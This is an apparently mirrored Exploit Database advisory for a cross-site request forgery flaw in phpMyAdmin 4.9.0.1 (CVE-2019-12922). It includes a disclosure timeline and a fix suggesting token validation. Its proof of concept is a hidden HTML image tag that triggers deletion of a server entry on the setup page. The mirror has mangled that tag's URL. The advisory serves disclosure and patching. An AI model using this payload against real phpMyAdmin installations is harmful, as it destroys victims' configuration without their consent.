phpMyAdmin 4.9.0.1 – Cross-Site Request Forgery

• Exploit Database
• 115 阅读

• 作者： Manuel García Cárdenas
  日期： 2019-09-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/47385/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80

  ============================================= MGC ALERT 2019-003 - Original release date: June 13, 2019 - Last revised:September 13, 2019 - Discovered by: Manuel Garcia Cardenas - Severity: 4,3/10 (CVSS Base Score) - CVE-ID: CVE-2019-12922 =============================================   I. VULNERABILITY ------------------------- phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery   II. BACKGROUND ------------------------- phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the Web. phpMyAdmin supports a wide range of operations on MySQL and MariaDB.   III. DESCRIPTION ------------------------- Has been detected a Cross-Site Request Forgery in phpMyAdmin, that allows an attacker to trigger a CSRF attack against a phpMyAdmin user deleting any server in the Setup page.   IV. PROOF OF CONCEPT ------------------------- Exploit CSRF - Deleting main server   <p>Deleting Server 1</p> <img src="https://www.exploit-db.com/exploits/47385/ http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1" style="display:none;" />   V. BUSINESS IMPACT ------------------------- The attacker can easily create a fake hyperlink containing the request that wants to execute on behalf the user,in this way making possible a CSRF attack due to the wrong use of HTTP method.   VI. SYSTEMS AFFECTED ------------------------- phpMyAdmin <= 4.9.0.1   VII. SOLUTION ------------------------- Implement in each call the validation of the token variable, as already done in other phpMyAdmin requests.   VIII. REFERENCES ------------------------- https://www.phpmyadmin.net/   IX. CREDITS ------------------------- This vulnerability has been discovered and reported by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).   X. REVISION HISTORY ------------------------- June 13, 2019 1: Initial release September 13, 2019 2: Last revision   XI. DISCLOSURE TIMELINE ------------------------- June 13, 2019 1: Vulnerability acquired by Manuel Garcia Cardenas June 13, 2019 2: Send to vendor July 16, 2019 3: New request to vendor without fix date September 13, 2019 4: Sent to lists   XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.   XIII. ABOUT ------------------------- Manuel Garcia Cardenas Pentester